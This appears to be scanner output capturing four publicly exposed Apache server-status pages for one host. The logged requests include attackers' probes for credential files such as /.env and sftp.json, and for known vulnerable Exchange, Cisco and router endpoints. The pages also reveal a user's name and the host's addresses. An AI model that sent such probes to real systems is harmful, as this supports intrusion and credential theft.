Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Wednesday, 23-Oct-2024 21:14:35 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 337 Parent Server MPM Generation: 336 Server uptime: 334 days 14 hours 14 minutes 56 seconds Server load: 0.05 0.04 0.01 Total accesses: 576320 - Total Traffic: 62.2 GB - Total Duration: 80345197 CPU Usage: u964.96 s1881.3 cu6118.11 cs1714.6 - .0369% CPU load .0199 requests/sec - 2310 B/second - 113.2 kB/request - 139.411 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02682204no0yes124000 12682205no0yes025000 Sum200 149000 ___W______________________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33626822040/44/5974_ 11.3455909046010.00.13110.47 162.19.236.43http/1.1 0-33626822040/60/5915_ 11.4355928381500.00.1984.66 162.19.236.43http/1.1localhost:80POST / HTTP/1.1 0-33626822040/49/6028_ 11.5601398749510.00.1195.36 164.90.208.56http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 0-33626822041/46/5925W 11.29008663970.00.12102.51 164.90.208.56http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 0-33626822040/45/6010_ 11.30208861460.03.07109.10 164.90.208.56http/1.1 0-33626822040/43/6039_ 11.5901248923790.00.17127.87 164.90.208.56http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-33626822040/48/6016_ 11.4356008671720.00.2277.42 162.19.236.43http/1.1localhost:80GET /.env HTTP/1.1 0-33626822040/39/5951_ 11.2156008631380.00.0799.88 162.19.236.43http/1.1 0-33626822040/53/5909_ 10.95218802050.00.1491.70 164.90.208.56h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33626822040/43/5990_ 11.23209215040.00.07174.39 164.90.208.56h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33626822040/48/5975_ 11.4202858654910.00.1480.95 94.159.113.15http/1.1ravignon.mycloud.paris:443GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutG 0-33626822040/58/5933_ 11.5701418664840.00.1472.65 164.90.208.56http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-33626822040/39/6012_ 11.34209131990.00.2096.11 164.90.208.56h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33626822040/36/5977_ 11.3723148884090.00.1386.21 164.90.208.56http/1.1 0-33626822040/47/6008_ 10.80008832530.00.2158.81 89.95.112.211h2ravignon.mycloud.paris:443[0/0] init 0-33626822040/43/6059_ 11.5701329274240.00.1497.46 164.90.208.56http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-33626822040/54/5982_ 11.5512008961950.03.04133.88 164.90.208.56http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 0-33626822040/56/5917_ 11.5601368761950.00.16117.95 164.90.208.56http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-33626822040/33/5935_ 11.32108488960.00.0494.01 162.19.236.43http/1.1 0-33626822040/36/5878_ 11.31108933420.00.1089.97 164.90.208.56h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33626822040/48/5915_ 11.32118439340.00.0966.21 164.90.208.56http/1.1 0-33626822040/47/5905_ 11.5411628898370.00.1871.89 164.90.208.56http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-33626822040/44/5825_ 11.38108427520.00.1179.62 164.90.208.56http/1.1 0-33626822040/35/5916_ 10.75108863420.00.1393.19 164.90.208.56h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33626822040/49/5923_ 11.38228910400.00.11130.52 164.90.208.56http/1.1 1-33626822050/16/8549_ 2.42209965370.00.081827.93 89.95.112.211h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-33626822050/11/8425_ 2.889501010166720.00.011180.92 89.95.112.211h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-33626822050/16/7397_ 1.99949609503500.00.011543.53 89.95.112.211h2ravignon.mycloud.paris:443[0/0] init 1-33626822050/10/8112_ 2.79949509846650.00.041704.94 162.19.236.43http/1.1localhost:80GET /.env HTTP/1.1 1-33626822050/17/7423_ 2.70912219951100.00.031292.09 89.95.112.211h2ravignon.mycloud.paris:443[0/0] init 1-33626822050/20/9440_ 2.799122210045960.00.041501.02 162.19.236.43http/1.1localhost:80POST / HTTP/1.1 1-33626822050/25/7696_ 2.92789539750490.00.051651.48 92.249.48.49http/1.1localhost:80GET / HTTP/1.1 1-33626822050/21/9906_ 2.7675123039966270.00.061824.59 89.95.112.211h2ravignon.mycloud.paris:443[0/0] init 1-33626822050/14/7924_ 2.9622789672390.00.031352.22 164.90.208.56http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33626822050/11/8356_ 2.087890010099950.00.011691.55 89.95.112.211h2ravignon.mycloud.paris:443[0/0] init 1-33626822050/17/8393_ 2.83789009493000.00.021959.66 89.95.112.211h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-33626822050/19/7921_ 2.828649010067030.00.024064.71 167.94.138.185http/1.1 1-33626822050/12/7554_ 2.918649010017910.00.022088.34 167.94.138.185http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-33626822050/12/9297_ 2.63864809713420.00.031623.35 89.95.112.211h2ravignon.mycloud.paris:443[0/0] init 1-33626822050/15/7292_ 2.90912109876420.00.021163.18 89.95.112.211h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-33626822050/9/8083_ 2.9365702039805450.00.061368.68 172.214.114.1http/1.1localhost:80MGLNDD_109.190.179.92_80\n 1-33626822050/10/8177_ 2.657512110025310.00.021842.73 199.45.154.146h2clocalhost:80[0/0] init 1-33626822050/15/7199_ 2.7486481689611430.00.022008.75 167.94.138.185h2clocalhost:80[0/0] done 1-33626822050/12/7597_ 2.63864909498300.00.032348.78 93.174.93.12http/1.1localhost:80\x16\x03\x02\x01o\x01 1-33626822050/13/7271_ 2.908649212652260.00.051966.48 167.94.138.185http/1.1localhost:80GET / HTTP/1.1 1-33626822050/12/8229_ 1.75911939729310.00.011901.97 89.95.112.211h2ravignon.mycloud.paris:443[1/1] done 1-33626822050/12/7301_ 1.77864909916400.00.013157.66 167.94.138.185h2clocalhost:80[0/0] init 1-33626822050/8/7540_ 2.576570219886390.00.063645.11 89.95.112.211h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 1-33626822050/14/7482_ 2.867013310121130.00.041236.07 4.151.229.209http/1.1 1-33626822050/17/7292_ 2.65751209610290.00.011607.62 199.45.154.146h2clocalhost:80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fbd13f435f
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Monday, 21-Oct-2024 21:24:58 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 335 Parent Server MPM Generation: 334 Server uptime: 332 days 14 hours 25 minutes 19 seconds Server load: 0.05 0.01 0.00 Total accesses: 572032 - Total Traffic: 62.2 GB - Total Duration: 80311349 CPU Usage: u954.04 s1867.35 cu6093.11 cs1704.78 - .037% CPU load .0199 requests/sec - 2323 B/second - 114.0 kB/request - 140.397 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02673460no0yes025000 12673461no0yes124000 Sum200 149000 ____________________________W_____________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33426734600/6/5838_ 1.43319909039010.00.03110.20 185.191.126.248http/1.1localhost:80POST /cgi-bin/ViewLog.asp HTTP/1.1 0-33426734600/8/5769_ 1.4911598374070.00.0784.38 46.101.1.225http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-33426734600/6/5909_ 0.78301608746050.00.0295.20 5.181.27.147http/1.1 0-33426734600/8/5794_ 0.96276618651860.00.01102.26 195.211.96.85h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33426734600/13/5878_ 1.38300738840100.00.05105.91 172.86.79.17http/1.1 0-33426734600/10/5924_ 1.406263958904630.00.08124.68 71.6.134.232http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-33426734600/11/5886_ 1.182626928664290.00.0977.07 159.100.18.26h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33426734600/8/5840_ 1.38293118625210.00.0399.69 159.100.6.239http/1.1 0-33426734600/10/5781_ 1.261110508798910.00.0591.47 185.91.69.5http/1.1localhost:80{\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"igwrcvap\",\"params\" 0-33426734600/7/5873_ 0.96319929207960.00.05174.15 185.191.126.248http/1.1 0-33426734600/11/5850_ 1.24418218642500.00.0880.68 185.191.126.248http/1.1localhost:80GET / HTTP/1.1 0-33426734600/10/5812_ 1.12593408655170.00.0772.40 64.62.197.240h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33426734600/9/5889_ 1.425934179113550.00.1395.75 34.241.4.203http/1.1ravignon.mycloud.paris:443GET /dist/core-files_client.js HTTP/1.1 0-33426734600/14/5871_ 1.381015218873400.00.0786.01 213.32.122.81http/1.1localhost:80GET / HTTP/1.1 0-33426734600/10/5886_ 1.21647518828890.00.0458.51 45.84.89.2http/1.1localhost:80GET / HTTP/1.1 0-33426734600/10/5945_ 1.296475119263750.00.0697.22 34.241.4.203http/1.1ravignon.mycloud.paris:443GET /dist/core-files_client.js HTTP/1.1 0-33426734600/11/5843_ 1.24545618942340.00.05130.68 46.0.134.72http/1.1 0-33426734600/12/5777_ 1.42418238750540.00.05117.64 125.228.118.156http/1.1localhost:80GET / HTTP/1.0 0-33426734600/11/5832_ 1.20866748484390.00.0593.84 64.87.1.80http/1.1 0-33426734600/9/5763_ 1.39648008928920.00.0889.72 179.43.191.98http/1.1localhost:80GET / HTTP/1.1 0-33426734600/7/5772_ 1.42545618432880.00.0465.93 46.0.134.72http/1.1localhost:80GET / HTTP/1.1 0-33426734600/10/5788_ 1.35283418888980.00.0371.58 195.123.246.80h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33426734600/7/5689_ 1.261015218422270.00.0479.31 185.91.69.5http/1.1localhost:80POST / HTTP/1.1 0-33426734600/10/5794_ 1.19108857560.00.0492.97 185.224.128.83http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 0-33426734600/8/5790_ 1.3727281688904810.00.05130.29 195.123.219.34http/1.1 1-33426734610/23/8505_ 4.7793119957700.00.141827.76 179.43.133.162http/1.1localhost:80CONNECT cloudflare.com:443 HTTP/1.1 1-33426734610/19/8369_ 4.911010158850.00.051180.81 46.101.1.225h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33426734610/26/7349_ 5.0401749500690.00.201543.44 46.101.1.225http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33426734611/27/8070W 3.64009840860.00.071704.83 46.101.1.225http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-33426734610/23/7378_ 3.72039949800.00.161292.01 45.61.133.122http/1.1 1-33426734610/14/9387_ 5.06011210038330.00.101500.91 46.101.1.225http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-33426734610/17/7638_ 4.9483529747220.00.071651.37 130.211.102.244http/1.1localhost:80GET / HTTP/1.1 1-33426734610/22/9856_ 3.6193109961610.00.171824.49 97.74.88.7http/1.1 1-33426734610/14/7875_ 2.42149667960.00.051352.15 46.101.1.225http/1.1 1-33426734610/19/8314_ 5.0706110097540.00.171691.49 46.101.1.225http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-33426734610/13/8333_ 2.41109489670.00.041959.55 46.101.1.225h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33426734610/26/7862_ 3.68112210064890.00.184064.63 46.101.1.225http/1.1 1-33426734610/18/7506_ 4.930210015070.00.102088.23 220.133.107.48http/1.1localhost:80GET / HTTP/1.0 1-33426734610/21/9257_ 2.48109710690.00.151623.25 46.101.1.225http/1.1 1-33426734610/18/7248_ 5.070609876280.00.131163.11 46.101.1.225http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-33426734610/15/8040_ 3.64009799870.00.081368.60 198.235.24.58http/1.1 1-33426734610/20/8126_ 3.631010023300.00.081842.61 46.101.1.225h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33426734610/16/7155_ 5.070579608270.03.112008.68 46.101.1.225http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-33426734610/17/7557_ 3.6612329493410.00.112348.68 46.101.1.225h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33426734610/17/7229_ 2.411012645800.00.161966.35 46.101.1.225http/1.1 1-33426734610/16/8187_ 2.41109725950.00.101901.90 46.101.1.225h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33426734610/20/7260_ 5.080599915730.03.063157.62 46.101.1.225http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-33426734610/20/7502_ 3.64119872060.00.173642.04 46.101.1.225http/1.1 1-33426734610/22/7439_ 4.79835510118350.00.111235.96 130.211.102.244http/1.1 1-33426734610/14/7250_ 5.0601859606370.00.121607.52 46.101.1.225http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 2-330-0/0/2604. 0.003362971963429060.00.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fbc80cf9e1
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Saturday, 19-Oct-2024 21:48:00 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 333 Parent Server MPM Generation: 332 Server uptime: 330 days 14 hours 48 minutes 21 seconds Server load: 0.00 0.00 0.00 Total accesses: 570443 - Total Traffic: 62.2 GB - Total Duration: 80217660 CPU Usage: u948.8 s1856.24 cu6081.16 cs1701.47 - .0371% CPU load .02 requests/sec - 2336 B/second - 114.3 kB/request - 140.623 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02664965no0yes025000 12664966no0yes124000 Sum200 149000 _______________________________________W__________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33226649650/6/5811_ 2.2833046009036800.02.97110.13 51.159.101.221http/1.1ravignon.mycloud.paris:443GET /dist/core-common.js?v=ccbf35ac-1 HTTP/1.1 0-33226649650/2/5742_ 0.49326118369620.00.0284.26 51.159.101.221h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33226649650/3/5875_ 0.94330408742940.00.0095.14 51.159.101.221http/1.1 0-33226649650/1/5773_ 0.49326118650500.00.01102.22 51.159.101.221http/1.1 0-33226649650/4/5846_ 0.94330408834080.00.05105.79 51.159.101.221http/1.1 0-33226649650/3/5891_ 0.8733041308896750.00.03124.50 51.159.101.221http/1.1 0-33226649650/7/5856_ 1.6332591778649990.00.0576.86 51.159.101.221http/1.1 0-33226649650/3/5812_ 2.30330388616680.00.0699.61 51.159.101.221http/1.1ravignon.mycloud.paris:443GET /dist/core-main.js?v=ccbf35ac-1 HTTP/1.1 0-33226649650/4/5751_ 2.37178528784740.00.0191.29 178.211.139.188http/1.1localhost:80GET / HTTP/1.1 0-33226649650/2/5838_ 2.3718162059196590.00.03173.99 179.43.191.19http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-33226649650/2/5828_ 2.353259238628220.00.0580.57 51.159.101.221http/1.1ravignon.mycloud.paris:443GET /dist/core-main.js?v=ccbf35ac-1 HTTP/1.1 0-33226649650/5/5778_ 0.94330308643020.00.0172.19 51.159.101.221http/1.1 0-33226649650/4/5866_ 2.3766009109200.00.0195.61 93.174.93.12http/1.1localhost:80\x16\x03\x02\x01o\x01 0-33226649650/5/5831_ 0.9766008868750.00.0485.88 51.159.101.221http/1.1 0-33226649650/4/5856_ 0.95181608824550.00.0158.42 45.155.91.226http/1.1localhost:80GET /level/15/exec/-/sh/run/CR HTTP/1.1 0-33226649650/6/5913_ 1.64178009257460.00.0496.95 51.159.101.221http/1.1localhost:80HEAD / HTTP/1.1 0-33226649650/2/5810_ 0.31178038933410.00.02130.53 51.159.101.221http/1.1 0-33226649650/5/5746_ 2.3811118746060.00.09117.53 68.183.9.16http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-33226649650/5/5796_ 1.6232616008468120.02.9693.68 51.159.101.221h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33226649650/5/5729_ 1.671918908640.00.0789.54 68.183.9.16h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33226649650/2/5742_ 0.93108421630.00.0265.76 5.89.229.116http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-33226649650/4/5760_ 0.94118881520.00.0371.49 68.183.9.16http/1.1 0-33226649650/2/5655_ 0.94330408408930.00.0179.18 92.154.95.236http/1.1localhost:80GET /owa/auth/logon.aspx HTTP/1.1 0-33226649650/5/5772_ 1.671638842880.00.0792.87 68.183.9.16http/1.1 0-33226649650/2/5759_ 0.55330418899640.00.00130.19 51.159.101.221h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33226649660/19/8469_ 4.650669936330.00.201827.54 68.183.9.16http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33226649660/13/8338_ 4.6606810156510.00.091180.74 68.183.9.16http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-33226649660/14/7306_ 4.660579478020.00.101543.19 68.183.9.16http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-33226649660/16/8025_ 4.6901359836210.00.151704.69 68.183.9.16http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-33226649660/14/7338_ 4.670639937550.00.151291.80 68.183.9.16http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-33226649660/16/9360_ 4.67013310020000.00.191500.78 68.183.9.16http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-33226649660/11/7608_ 4.6801249745490.00.061651.27 68.183.9.16http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-33226649660/12/9816_ 2.97120509830380.00.071824.24 51.159.101.221h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33226649660/13/7846_ 4.62121019662710.00.091352.04 95.214.55.43http/1.1localhost:80GET / HTTP/1.1 1-33226649660/17/8285_ 4.561110048790.00.081688.32 68.183.9.16h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33226649660/15/8307_ 4.610709486480.00.151959.44 135.125.244.52http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 1-33226649660/13/7820_ 4.621090010055340.00.084064.42 179.43.191.98http/1.1localhost:80GET / HTTP/1.1 1-33226649660/15/7472_ 4.61010910009210.00.172088.06 135.125.244.52http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-33226649660/10/9226_ 2.87157129687030.00.041623.07 51.159.103.14http/1.1 1-33226649661/10/7217W 4.62009866790.00.081162.93 68.183.9.16http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-33226649660/10/8006_ 3.05120509785810.00.051368.45 51.159.101.221http/1.1 1-33226649660/11/8092_ 3.08020110013760.00.071842.51 51.159.101.221http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33226649660/13/7128_ 3.06109580260.00.072005.54 68.183.9.16h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33226649660/12/7521_ 2.98108509469830.00.062348.52 51.159.101.221h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33226649660/15/7197_ 4.551135612523600.03.041965.51 68.183.9.16h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33226649660/15/8155_ 3.05108519704690.00.131901.77 51.159.101.221http/1.1 1-33226649660/11/7227_ 1.93139885410.00.073154.52 68.183.9.16http/1.1 1-33226649660/10/7470_ 3.00119852730.00.133641.81 68.183.9.16http/1.1 1-33226649660/17/7406_ 4.571210005000.00.191235.81 68.183.9.16http/1.1 1-33226649660/10/7225_ 3.011659592770.00.051607.36 68.183.9.16h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 2-330-0/0/2604. 0.001648791963429060.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb67cdac1a
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Thursday, 17-Oct-2024 21:29:13 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 331 Parent Server MPM Generation: 330 Server uptime: 328 days 14 hours 29 minutes 34 seconds Server load: 0.00 0.00 0.00 Total accesses: 568563 - Total Traffic: 62.2 GB - Total Duration: 80166573 CPU Usage: u953.89 s1849.2 cu6055.53 cs1692.38 - .0372% CPU load .02 requests/sec - 2350 B/second - 114.6 kB/request - 140.999 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02656059no0yes025000 12656060no0yes124000 22659308no0yes025000 Sum300 174000 ____________________________W___________________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33026560590/44/5795_ 8.9698481469022130.00.31107.10 198.235.24.111http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-33026560590/34/5725_ 8.901217508365030.00.2084.15 128.199.162.105http/1.1localhost:80GET /config/helper.js HTTP/1.1 0-33026560590/36/5854_ 9.02177808741040.00.2395.10 185.191.126.248http/1.1localhost:80POST /HNAP1/ HTTP/1.1 0-33026560590/33/5752_ 8.8913428649230.00.23102.15 128.199.162.105http/1.1localhost:80\x16\x03\x01 0-33026560590/33/5823_ 8.931260508828570.00.19105.72 5.8.11.202http/1.1localhost:80\x16\x03\x02\x01o\x01 0-33026560590/35/5874_ 9.0120703028892570.00.26124.41 64.227.159.16http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-33026560590/43/5827_ 8.90984808643020.00.3176.72 128.199.162.105http/1.1localhost:80\x16\x03\x01 0-33026560590/35/5797_ 9.0421538614830.00.2899.51 157.245.204.205http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-33026560590/40/5732_ 8.90126056148783170.00.2891.27 128.199.162.105http/1.1localhost:80\x16\x03\x01 0-33026560590/41/5817_ 8.91177819191590.00.29173.91 185.191.126.248http/1.1 0-33026560590/41/5811_ 8.941218018621800.00.2380.46 185.191.126.248http/1.1localhost:80GET / HTTP/1.1 0-33026560590/38/5747_ 8.901185008638530.00.2872.11 2.57.149.233http/1.1 0-33026560590/38/5848_ 8.92209107460.00.2695.56 114.38.218.201http/1.1localhost:80GET / HTTP/1.0 0-33026560590/41/5812_ 8.891410308864760.00.2385.79 128.199.162.105http/1.1localhost:80\x16\x03\x01 0-33026560590/35/5842_ 8.91207008822850.00.2458.37 128.199.162.105http/1.1localhost:80GET /php.ini HTTP/1.1 0-33026560590/31/5889_ 9.02128949254430.00.1996.86 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 0-33026560590/32/5793_ 8.91515008929660.00.24130.47 128.199.162.105http/1.1localhost:80GET /index.js HTTP/1.1 0-33026560590/36/5723_ 8.93141032668737020.00.24117.42 45.140.17.26http/1.1ravignon.mycloud.paris:443GET /+CSCOE+/logon.html HTTP/1.1 0-33026560590/35/5767_ 8.9073487868459480.00.2490.70 123.160.221.135http/1.1 0-33026560590/38/5707_ 8.89908903390.00.2389.43 157.245.204.205http/1.1 0-33026560590/35/5720_ 8.90908418860.00.2065.69 157.245.204.205http/1.1 0-33026560590/44/5736_ 8.901217508875810.00.3171.36 128.199.162.105http/1.1localhost:80GET /config/index.js HTTP/1.1 0-33026560590/37/5632_ 8.89128908405950.00.2579.11 54.36.115.221http/1.1 0-33026560590/37/5753_ 8.98515508834950.00.2392.73 185.224.128.67http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-33026560590/40/5738_ 9.034778895550.00.26130.12 157.245.204.205http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-33026560600/49/8408_ 12.301263629914450.00.331827.16 185.242.226.117http/1.1ravignon.mycloud.paris:443GET /core/img/favicon.ico HTTP/1.1 1-33026560600/47/8297_ 12.4505810149250.00.311180.56 157.245.204.205http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-33026560600/57/7255_ 12.235454189467640.00.381543.01 128.199.162.105http/1.1localhost:80\x16\x03\x01 1-33026560601/61/7964W 12.23009814420.00.401704.35 157.245.204.205http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-33026560600/51/7294_ 12.28166191459928140.00.391291.58 135.125.244.52http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 1-33026560600/60/9298_ 12.445639995510.00.441500.41 157.245.204.205http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-33026560600/60/7555_ 12.24734709731150.00.361651.04 128.199.162.105http/1.1localhost:80GET /console/payments/config.json HTTP/1.1 1-33026560600/46/9753_ 12.425452309825550.00.311824.06 20.236.249.48http/1.1ravignon.mycloud.paris:443GET /owa/auth/x.js HTTP/1.1 1-33026560600/55/7798_ 12.32126361199650600.00.411351.84 185.242.226.117http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33026560600/60/8225_ 12.35734726610039270.00.331688.10 123.160.221.135http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33026560600/40/8253_ 12.23793109473340.00.211959.13 128.199.162.105http/1.1localhost:80GET /config/env HTTP/1.1 1-33026560600/62/7762_ 12.39121829710045070.00.454064.18 135.125.244.52http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-33026560600/51/7411_ 12.22293909980590.00.342087.72 128.199.162.105http/1.1localhost:80GET /conf/config.py HTTP/1.1 1-33026560600/43/9172_ 12.211753409673120.00.271622.84 128.199.162.105http/1.1localhost:80\x16\x03\x01 1-33026560600/50/7161_ 12.36293929847850.00.331162.63 43.135.182.95http/1.1localhost:80GET / HTTP/1.1 1-33026560600/60/7955_ 12.33796019774980.00.361368.28 5.8.11.202http/1.1localhost:80GET / HTTP/1.0 1-33026560600/54/8043_ 12.19713353810000890.00.381842.30 128.199.162.105http/1.1ravignon.mycloud.paris:443GET /console/payments/config.json HTTP/1.1 1-33026560600/57/7080_ 12.3671341879561570.00.392005.32 135.125.244.52http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 1-33026560600/52/7468_ 12.26175341549458730.00.412348.34 193.201.9.103http/1.1ravignon.mycloud.paris:443GET /+CSCOE+/logon.html?fcadbadd=1 HTTP/1.1 1-33026560600/65/7144_ 12.2316619012493680.00.401962.35 128.199.162.105http/1.1localhost:80GET /config/server.js HTTP/1.1 1-33026560600/51/8109_ 12.21126367239689640.00.381901.48 185.242.226.117http/1.1 1-33026560600/55/7180_ 12.20126369059870140.00.323154.27 128.199.162.105http/1.1localhost:80\x16\x03\x01 1-33026560600/62/7422_ 12.23209844050.00.473641.49 128.199.162.105http/1.1localhost:80GET /config/application.yml HTTP/1.1 1-33026560600/56/7349_ 12.24121819978960.00.321235.42 128.199.162.105http/1.1localhost:80GET /phpinfo.php HTTP/1.1 1-330</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb4cff1b04
